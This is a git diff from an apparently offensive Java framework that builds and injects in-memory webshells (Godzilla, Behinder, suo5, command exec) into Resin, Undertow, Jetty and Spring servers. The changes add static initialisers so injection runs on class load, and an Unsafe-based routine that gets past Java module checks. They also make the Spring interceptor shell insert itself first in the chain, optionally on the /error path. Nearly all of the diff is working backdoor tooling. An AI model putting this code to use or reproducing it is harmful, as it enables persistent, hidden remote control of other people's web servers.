- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
}
@@ -353,13 +414,13 @@ public byte[] resinListenerBehinder(Class cls, JavaClassHelper javaClassHelper)
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.sou5)
public byte[] resinListenerSuo5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
resinListenerResponseMaker(ctClass);
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
return JavaClassModifier.toBytes(ctClass);
}
@@ -374,60 +435,97 @@ public void resinListenerResponseMaker(CtClass ctClass) throws Exception {
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Exec)
public byte[] resinServletExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Resin)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] resinServletGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
godzillaMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Resin)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] resinServletBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
behinderMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Resin)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.sou5)
public byte[] resinServletSuo5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Resin)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Exec)
public byte[] resinFilterExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Resin)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] resinFilterGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
godzillaMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Resin)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] resinFilterBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
behinderMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Resin)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.sou5)
public byte[] resinFilterSuo5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
/**
@@ -437,43 +535,61 @@ public byte[] resinFilterSuo5(Class cls, JavaClassHelper javaClassHelper) throws
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Exec)
public byte[] undertowServletExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Undertow)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] undertowServletGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
godzillaMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Undertow)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] undertowServletBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
behinderMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Undertow)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.sou5)
public byte[] undertowServletSou5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Undertow)
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Exec)
public byte[] undertowListenerExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
undertowListenerResponseMaker(ctClass);
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
return JavaClassModifier.toBytes(ctClass);
}
@@ -481,14 +597,15 @@ public byte[] undertowListenerExec(Class cls, JavaClassHelper javaClassHelper) t
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] undertowListenerGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
undertowListenerResponseMaker(ctClass);
godzillaMS(javaClassHelper);
- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
}
@@ -496,14 +613,15 @@ public byte[] undertowListenerGodzilla(Class cls, JavaClassHelper javaClassHelpe
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] undertowListenerBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
undertowListenerResponseMaker(ctClass);
behinderMS(javaClassHelper);
- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
}
@@ -511,13 +629,13 @@ public byte[] undertowListenerBehinder(Class cls, JavaClassHelper javaClassHelpe
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.sou5)
public byte[] undertowListenerSuo5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
undertowListenerResponseMaker(ctClass);
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
return JavaClassModifier.toBytes(ctClass);
}
@@ -547,30 +665,48 @@ public void undertowListenerResponseMaker(CtClass ctClass) throws Exception {
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Exec)
public byte[] undertowFilterExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Undertow)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] undertowFilterGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
godzillaMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Undertow)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] undertowFilterBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
behinderMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Undertow)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.sou5)
public byte[] undertowFilterSou5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
public static void godzillaMS(JavaClassHelper javaClassHelper) throws Exception {
@@ -594,22 +730,6 @@ public static void behinderMS(JavaClassHelper javaClassHelper) throws Exception
javaClassHelper.setPass(CryptoUtils.md5Half(pass));
}
- /**
- * 默认
- *
- * @param cls
- * @param javaClassHelper
- * @return
- * @throws Exception
- */
- public static byte[] defaultOriginalMS(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- CtClass ctClass = initCtClass(cls);
-
- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
- return JavaClassModifier.toBytes(ctClass);
- }
-
public static CtClass initCtClass(Class cls) throws Exception {
ClassPool classPool = ClassPool.getDefault();
classPool.insertClassPath(new ClassClassPath(cls));
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/builder/MSLoaderBuilder.java b/javaClassBuilder/src/main/java/com/ppp/middleware/builder/MSLoaderBuilder.java
index 335e8f5..72eab01 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/builder/MSLoaderBuilder.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/builder/MSLoaderBuilder.java
@@ -89,6 +89,7 @@ public byte[] controller(Class cls, String MSGzipBase64, JavaClassHelper javaCla
@Middleware(Middleware.Spring)
@MemShell(MemShell.Interceptor)
public byte[] interceptor(Class cls, String MSGzipBase64, JavaClassHelper javaClassHelper) throws Exception {
+
return defaultLoader(cls, MSGzipBase64, javaClassHelper);
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/builder/RceEchoBuilder.java b/javaClassBuilder/src/main/java/com/ppp/middleware/builder/RceEchoBuilder.java
index 2c4660d..d8bf872 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/builder/RceEchoBuilder.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/builder/RceEchoBuilder.java
@@ -20,6 +20,8 @@ public byte[] build(Class cls, JavaClassHelper javaClassHelper) throws Exception
CtClass ctClass = classPool.getCtClass(cls.getName());
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/JettyAutoFindListenerThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/JettyAutoFindListenerThreadLoader.java
index e13d1de..7cf4a82 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/JettyAutoFindListenerThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/JettyAutoFindListenerThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -25,6 +26,9 @@
public class JettyAutoFindListenerThreadLoader {
private static String gzipObject;
private static String CLASSNAME;
+ static {
+ new JettyAutoFindListenerThreadLoader();
+ }
public JettyAutoFindListenerThreadLoader() {
try {
@@ -50,6 +54,7 @@ public JettyAutoFindListenerThreadLoader(Object o) {
* Jetty Listener
*/
public static void inject(Object servletContext) throws Exception {
+ addModule();
// Jetty 9
try {
Object[] _eventListeners = (Object[]) getFieldValue(servletContext, "_eventListeners");
@@ -383,4 +388,23 @@ public List getActiveClassLoaders() throws Exception {
return new ArrayList(activeClassLoaders);
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = JettyAutoFindListenerThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Throwable e) {
+
+ }
+ }
+
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/JettyListenerThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/JettyListenerThreadLoader.java
index 73f98a4..1cfc42c 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/JettyListenerThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/JettyListenerThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -25,7 +26,9 @@
public class JettyListenerThreadLoader {
private static String gzipObject;
private static String CLASSNAME;
-
+ static {
+ new JettyListenerThreadLoader();
+ }
public JettyListenerThreadLoader() {
try {
// 获取 servletContext
@@ -46,6 +49,7 @@ public JettyListenerThreadLoader() {
* Jetty Listener
*/
public static void inject(Object servletContext) throws Exception {
+ addModule();
// Jetty 9
try {
Object[] _eventListeners = (Object[]) getFieldValue(servletContext, "_eventListeners");
@@ -199,5 +203,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = JettyListenerThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Throwable e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinFilterThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinFilterThreadLoader.java
index ad8d471..1bf5d06 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinFilterThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinFilterThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -27,7 +28,9 @@ public class ResinFilterThreadLoader {
private static String CLASSNAME;
private static String PATH;
private static String NAME;
-
+ static {
+ new ResinFilterThreadLoader();
+ }
public ResinFilterThreadLoader() {
try {
inject();
@@ -40,6 +43,7 @@ public ResinFilterThreadLoader() {
* Resin Listener
*/
public static void inject() throws Exception {
+ addModule();
Thread[] threads = (Thread[]) getFieldValue(Thread.currentThread().getThreadGroup(), "threads");
for (int i = 0; i < threads.length; i++) {
@@ -170,5 +174,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ResinFilterThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Throwable e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinListenerThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinListenerThreadLoader.java
index d2773ca..db8b14b 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinListenerThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinListenerThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -25,7 +26,9 @@
public class ResinListenerThreadLoader {
private static String gzipObject;
private static String CLASSNAME;
-
+ static {
+ new ResinListenerThreadLoader();
+ }
public ResinListenerThreadLoader() {
try {
inject();
@@ -38,6 +41,7 @@ public ResinListenerThreadLoader() {
* Resin Listener
*/
public static void inject() throws Exception {
+ addModule();
Thread[] threads = (Thread[]) getFieldValue(Thread.currentThread().getThreadGroup(), "threads");
for (int i = 0; i < threads.length; i++) {
@@ -154,5 +158,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ResinListenerThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinServletThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinServletThreadLoader.java
index c49a248..8ed8bed 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinServletThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/ResinServletThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -27,7 +28,9 @@ public class ResinServletThreadLoader {
private static String CLASSNAME;
private static String PATH;
private static String NAME;
-
+ static {
+ new ResinServletThreadLoader();
+ }
public ResinServletThreadLoader() {
try {
inject();
@@ -40,6 +43,7 @@ public ResinServletThreadLoader() {
* Resin Servlet
*/
public static void inject() throws Exception {
+ addModule();
Thread[] threads = (Thread[]) getFieldValue(Thread.currentThread().getThreadGroup(), "threads");
for (int i = 0; i < threads.length; i++) {
@@ -157,5 +161,22 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ResinServletThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/SpringControllerContextLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/SpringControllerContextLoader.java
index 8e9c1fe..7b125a1 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/SpringControllerContextLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/SpringControllerContextLoader.java
@@ -4,12 +4,14 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
+import java.util.Base64;
import java.util.Map;
import java.util.zip.GZIPInputStream;
@@ -25,7 +27,9 @@ public class SpringControllerContextLoader {
private static String PATH;
private static String NAME;
private static String CLASSNAME;
-
+ static {
+ new SpringControllerContextLoader();
+ }
public SpringControllerContextLoader() {
try {
inject();
@@ -35,6 +39,7 @@ public SpringControllerContextLoader() {
}
public static void inject() throws Exception {
+ addModule();
Object requestAttributes = Class.forName("org.springframework.web.context.request.RequestContextHolder").getMethod("currentRequestAttributes").invoke(null);
Object context = invokeMethod(requestAttributes.getClass(), requestAttributes, "getAttribute", new Class[]{String.class, Integer.TYPE}, new Object[]{"org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0});
// 是否存在路由
@@ -130,4 +135,23 @@ public static void setFieldValue(final Object obj, final String fieldName, final
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = SpringControllerContextLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/SpringInterceptorContextLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/SpringInterceptorContextLoader.java
index c6ddbc4..d5cec64 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/SpringInterceptorContextLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/SpringInterceptorContextLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -20,10 +21,15 @@
@Middleware(Middleware.Spring)
@MemShell(MemShell.Interceptor)
@JavaClassType(JavaClassType.Default)
-@JavaClassModifiable({JavaClassModifiable.CLASSNAME})
+@JavaClassModifiable({JavaClassModifiable.CLASSNAME, JavaClassModifiable.PATH})
public class SpringInterceptorContextLoader {
private static String gzipObject;
private static String CLASSNAME;
+ private static String PATH;
+
+ static {
+ new SpringInterceptorContextLoader();
+ }
public SpringInterceptorContextLoader() {
try {
@@ -34,6 +40,7 @@ public SpringInterceptorContextLoader() {
}
public static void inject() throws Exception {
+ addModule();
Object requestAttributes = Class.forName("org.springframework.web.context.request.RequestContextHolder").getMethod("currentRequestAttributes").invoke(null);
Object context = invokeMethod(Class.forName("org.springframework.web.context.request.RequestAttributes"), requestAttributes, "getAttribute", new Class[]{String.class, Integer.TYPE}, new Object[]{"org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0});
Object abstractHandlerMapping = invokeMethod(Class.forName("org.springframework.context.support.AbstractApplicationContext"), context, "getBean", new Class[]{String.class}, new Object[]{"requestMappingHandlerMapping"});
@@ -49,18 +56,29 @@ public static void inject() throws Exception {
Class handlerInterceptorClass = Class.forName("org.springframework.web.servlet.HandlerInterceptor");
byte[] bytes = decompress(gzipObject);
+
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
- Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
- defineClass.setAccessible(true);
Class clazz;
try {
+ Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
+ defineClass.setAccessible(true);
clazz = (Class) defineClass.invoke(classLoader, bytes, 0, bytes.length);
} catch (Exception e) {
clazz = classLoader.loadClass(CLASSNAME);
}
+
Object javaObject = clazz.newInstance();
Object object = Proxy.newProxyInstance(handlerInterceptorClass.getClassLoader(), new Class[]{handlerInterceptorClass}, (InvocationHandler) javaObject);
- adaptedInterceptors.add(object);
+ // 插入到第一个
+ // 载入调试 org.springframework.web.servlet.handler.AbstractHandlerMapping#getHandlerExecutionChain
+ // 特定 path 比如 error
+ if (PATH != null) {
+ Class cls = Class.forName("org.springframework.web.servlet.handler.MappedInterceptor");
+ Object mappedInterceptor = cls.getConstructor(new Class[]{String[].class, String[].class, handlerInterceptorClass}).newInstance(new Object[]{new String[]{"/error"}, null, object});
+ adaptedInterceptors.add(0, mappedInterceptor);
+ } else {
+ adaptedInterceptors.add(0, object);
+ }
}
public static byte[] decompress(String gzipObject) throws Exception {
@@ -110,7 +128,6 @@ public static Object getFieldValue(final Object obj, final String fieldName) thr
final Field field = getField(obj.getClass(), fieldName);
return field.get(obj);
}
-
public static Field getField(final Class clazz, final String fieldName) {
Field field = null;
try {
@@ -127,4 +144,23 @@ public static void setFieldValue(final Object obj, final String fieldName, final
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = SpringInterceptorContextLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Throwable e) {
+
+ }
+ }
}
